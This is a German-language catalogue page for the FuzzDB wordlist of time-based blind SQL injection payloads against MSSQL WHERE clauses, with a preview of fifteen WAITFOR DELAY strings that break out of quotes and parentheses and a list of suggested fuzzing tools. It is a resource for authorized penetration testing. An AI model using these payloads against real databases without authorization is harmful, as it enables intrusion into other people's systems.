Skip to content
Fuzzing1.2 KB

FuzzDB Blind SQLi MSSQL WHERE Clause

Zeitbasierte Blind-SQL-Injection-Payloads für MSSQL-WHERE-Klauseln, die WAITFOR DELAY über zunehmend eskalierende Quote- und Klammer-Breakout-Kontexte hinweg nutzen.

Quelle ansehen
Größe
1.2 KB
Kategorie
Fuzzing
Quelle
fuzzdb-project/fuzzdb
Lizenz
GPLv2
Empfohlene Tools
sqlmapffufburp

Vorschau

Die ersten 15 Einträge. Lade die vollständige Liste (1.2 KB) herunter oder kopiere sie über die Schaltflächen oben.

>head blind-sqli-mssql-where-fuzzdb.txt1.2 KB
 waitfor delay '0:0:20' /* 
 waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /* 
' waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /* 
" waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /* 
) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /* 
)) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /* 
))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /* 
)))) waitfor delay '0:0:20' --
))))) waitfor delay '0:0:20' --

Zeitbasierte Blind-SQL-Injection-Payloads für MSSQL-WHERE-Klauseln, die WAITFOR DELAY über zunehmend eskalierende Quote- und Klammer-Breakout-Kontexte hinweg nutzen.

Diese Liste ist auf Input-Fuzzing und Schwachstellensuche ausgerichtet. Sie umfasst rund 1.2 KB und harmoniert gut mit Tools wie sqlmap, ffuf, burp. Wählen Sie die kleinste Liste, die zu Ihrem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeiten bieten, bei denen Geschwindigkeit weniger eine Einschränkung darstellt.

Sie können die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in Ihre Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt aus ihrer Upstream-Quelle auf GitHub ausgeliefert.

Bezogen von fuzzdb-project/fuzzdb und vertrieben unter GPLv2. Verwenden Sie Wortlisten nur gegen Systeme, für deren Test Sie ausdrücklich autorisiert sind.